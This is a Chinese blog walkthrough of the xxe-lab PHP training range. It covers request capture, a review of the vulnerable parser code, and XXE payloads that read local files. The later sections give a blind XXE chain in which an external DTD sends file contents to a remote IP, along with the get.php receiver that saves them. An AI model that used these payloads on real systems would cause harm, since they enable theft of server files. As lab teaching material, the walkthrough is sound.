xxe漏洞案例1-xxe lab for php

已于 2024-05-04 16:24:02 修改
阅读量792 收藏 24
点赞数 21
分类专栏: web安全 文章标签: php 开发语言
于 2024-05-04 16:23:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0529/article/details/138426002
版权

1.介绍

xxe lab是一个小的网站靶场,我们可以用这个网站对于xxe漏洞进行一个大致的了解

2.利用xxe漏洞进行读文件

1.搭建网站

https://github.com/c0ny1/xxe-lab从这里把这个zip下载下来

解压之后,把php_xxe文件夹放到www文件夹下面,在phpsudy搭建下需要把php的版本设置到5.2,5.3,5.4下。

2.打开网站

这里用自己的ip加上网站打开,要不下面的信息传输可能会出问题

在网页上打开就是这样的一个页面

3.抓包分析

打开burpsuite设置好端口号

我们可以看见这个地方抓到了包,我们可以借着这个数据包大致分析xml传递数据的特点

Content-Type: application/xml;charset=utf-8

<user><username>admin</username><password>111</password></user>

可以发现,这两个地方比较有特点

send repeat查看一下

可以发现这个是一个带有回显的回复,我们可以利用这个去尝试读文件

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/e.txt">
]>
<user><username>&test;</username><password>Mikasa</password></use
r>

大致解释一下这个代码内容,我们有一个实体test,内容是用file协议去读取d盘下面的e.txt.

这个地方需要注意一下的就是要改一下我给出的代码的回车,尽量给他弄成一排,要不可能会报错。

3.追溯源码

POST /php_xxe/doLogin.php HTTP/1.1

我们看到数据包有这一句,知道post数据的去向,我们打开这个php文件查看一下

$xmlfile = file_get_contents('php://input');这句是用php进行输入的意思,具体详细可以自己搜一下

$dom = new DOMDocument();
  $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);用xml语言解析
  $creds = simplexml_import_dom($dom);

$username = $creds->username;
 $password = $creds->password;

$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);刚刚页面返回的就是这个语句

这代表源码没有对于输入做任何过滤,而是直接就用xml解析了输入

4.没有回显的情况怎么办

我们把这个文件中的输出行失效掉

这里可以看见没办法看见文件内容了

在正常情况下没有显示我们可以猜想一下:代码?无回显?没漏洞?

我们这里确定是代码没问题的,我们看看到底有没有这个漏洞

1.带外测试

让xml语言,让服务器访问远程地址,如果远程地址可以查看到这个链接,就证明只是没有回显而已

DNSLog Platform

<?xml version="1.0" ?>
<!DOCTYPE test [
 <!ENTITY % file SYSTEM "http://9v57ll.dnslog.cn">
 %file;
]>
<user><username>&send;</username><password>Mikasa</password></user>

执行的时候把远程的域名改成网址给的

可以发现,xml语句仍然被执行了

可以得出结论,这个漏洞任然存在,只是没有回显而已。

2.外部引用实体

<?xml version="1.0" ?>
<!DOCTYPE test [
 <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
 %file;
]>
<user><username>&send;</username><password>Mikasa</password></use
r>
evil2.dtd
<!ENTITY send SYSTEM "file:///d:/e.txt">

在主机上我们新建一个实体文件试试看,能不能通过实体读取文件,把回显打开

说实在的,这个本机的搞不上去,这个代码估计是有点问题,我用了一个远程主机去做的,把%file变量的内容ip地址改成远程的就行,在远程主机上面开一个dtd去做

3.远程主机保存文件内容绕过无回显的问题

这个其实我搞了半天都是这样的

疯狂报错,真无语了

但是方法我还是放在这,有想试试的可以自己试试看

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///d:/e.txt">
<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
%remote;
%all;
]>
<root>&send;</root>
test.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 
'http://47.94.236.117/get.php?file=%file;'>">

在远程主机上要有一个文件test.dtd和一个get.php

get.php

<?php
$data=$_GET['file'];
$myfile=fopen("file.txt","w+");
fwrite($myfile,$data);
fclose($myfile);
?>

这样就可以在远程主机上出现一个file.txt保存下e.txt的内容了

小狗学士
关注
  • 21
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全之XXE漏洞复现及防御(上篇)(技术进阶)
weixin_70911257的博客
04-16 1287
xxe漏洞复现
XXE-Lab for PHP
m0_66299232的博客
09-10 648
2.将PHPStudy的中间件与版本信息调制为。1.在登录界面输入账号密码并抓取数据包....3.使用PHP伪协议读取文件....4.探测内网存活主机与端口...2.尝试读取本地文件....1.将靶场进行下载....访问以下地址开始练习...
xxe-lab靶场安装和简单php代码审计
永远是少年
12-23 2974
今天继续给大家介绍渗透测试相关知识,本文主要内容是xxe-lab靶场安装和简单php代码审计。 一、xxe-lab靶场简介 二、php xxe-lab靶场安装 三、xxe-lab靶场PHP代码审计
PHP-XXE-Lab——漏洞利用
W小哥
12-22 1781
一、环境搭建 环境源码下载地址:https://github.com/c0ny1/xxe-lab 下载后,php_xxe放在网站根目录即可运行 二、漏洞利用 访问目标网站,如下图所示 输入用户名、密码后,使用burpsuite拦截数据包,仔细观察传输数据的部分,跟大多数传输数据方式不一样 大多数传递方式,是下面这两种 所以,如果在渗透测试过程中,发现POST数据传递方式是 adminpassword 则说明,网站是采用的XML语言接收的数据,此处可能存在XXE漏洞 接下来,利用XXE漏洞读取敏感文件
DTD学习一(入门)
Joy的专栏
04-04 575
一 简介 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 二、实例 1、如果一个DTD被包含在XML源文件中,如使用如下test.xml: 文档定义语法: 元素定义语法: 2、如果是一个XML文件引用一个外部的DTD文件,如下实例: te
xxe-lab来深入学习xxe漏洞
aaeoj8957的博客
06-07 733
这几天,想复习一下xxe的知识,于是把以前的一个靶场拿过来玩玩,顺便审计一下代码2333,靶场地址:https://github.com/c0ny1/xxe-lab 首先先练习的是php-xxe: ...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
第三节 简单XXE漏洞代码编写-01
09-15
XXE漏洞代码编写详解 XXE漏洞(XML External Entity),是一种常见的安全漏洞,攻击者可以通过构造恶意的XML数据,来访问服务器上的敏感信息。下面我们将详细介绍XXE漏洞的代码编写。 file_get_content函数介绍 ...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
XXE - 防御策略-01
09-15
XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 从 2018 年...
[红日安全]Web安全Day8 - XXE实战攻防
hongrisec的博客
03-03 963
本文由红日安全成员: ruanruan 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pyt...
WEB常见漏洞XXE(靶场篇)
最新发布
Javachichi的博客
11-10 508
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
XXE漏洞原理、xxe-lab演示和防御
m0_61506558的博客
08-24 719
eXtensibleMarkupLanguage可扩展标记语言常用于从客户端向服务器提交数据。然后, 服务器端应用程序将处理这些数据,并且可能会返回一个包含XML或任何其他格式数据的响应。和HTML有一定的相像之处(部分语法不同),它还可以做配置文件、交换数据和图像格式等等。
XXEXXE-Lab
情感博主V
02-24 1584
简介 1. XXE Injection(XML External Entity Injection)XML外部实体注入 服务端接收和解析了来自用户端的XML数据,而又没有做严格的安全控制,从而导致XML外部实体注入。 2. XML(Extensible Markup Language)可扩展标记语言 XML用来传输和存储数据; XML的标签没有预定义,需要自行定义标签; XML文档结构包括:XML...
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2305
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml中实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
XXE—实体注入、XXE-lab-master(php_xxe WriteUp)
weixin_41487522的博客
06-25 2028
XXE—实体注入 XXE是什么? XXE=xml external entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分。 什么是XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3
边打XXE-lab边学习(一)
negnegil的博客
06-19 4763
一、简介及靶场搭建 简介 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 XXE原理 XXE即XML外部实体注入 。我们先分别理解一下注入和外部实体的含义。 注入:是指XML数据在传输过程中被修改,导致服务器执行了修改后的恶意代码,从而达到攻击目的。 外部实体:则是指攻击者通过利用外部实体声明部分来对XML数据进行修改、插入恶意代码。 所以XXE就是指XML数据在传输过程中利用外部实体声明部分的“SYSTEM
XXE漏洞深入探索:从新手到高手
"XXE(XML External Entity)漏洞是一种安全问题,主要出现在处理XML文档的程序中,允许攻击者通过恶意构造的XML输入来访问服务器的内部资源。本教程将带你从初学者到专家,逐步了解和掌握XXE漏洞的利用方法。" XXE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值